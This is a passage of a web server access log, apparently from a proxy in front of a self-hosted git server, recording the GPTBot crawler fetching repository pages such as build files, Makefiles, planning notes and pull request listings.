192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15631] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19485] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15606] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15631] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15631] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore?display=source" [Client 74.7.227.38] [Length 11348] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:17:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild" [Client 74.7.227.38] [Length 142693] [Gzip 13.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:17:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp" [Client 74.7.227.38] [Length 102507] [Gzip 10.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2f.vscode" [Client 74.7.227.38] [Length 25974] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/.vscode" +[17/Feb/2026:17:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp" [Client 74.7.227.38] [Length 37773] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fmain.cpp" [Client 74.7.227.38] [Length 25216] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild" [Client 74.7.227.38] [Length 131152] [Gzip 14.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:17:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp" [Client 74.7.227.38] [Length 83111] [Gzip 12.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9948] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13648] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12740] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" +[17/Feb/2026:17:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:17:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=source" [Client 74.7.227.38] [Length 14283] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:17:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:17:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=source" [Client 74.7.227.38] [Length 14250] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:17:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9797] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" +[17/Feb/2026:17:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 10745] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10047] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:17:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11596] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36197] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36199] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36199] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:25:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:25:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9952] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10653] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10292] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 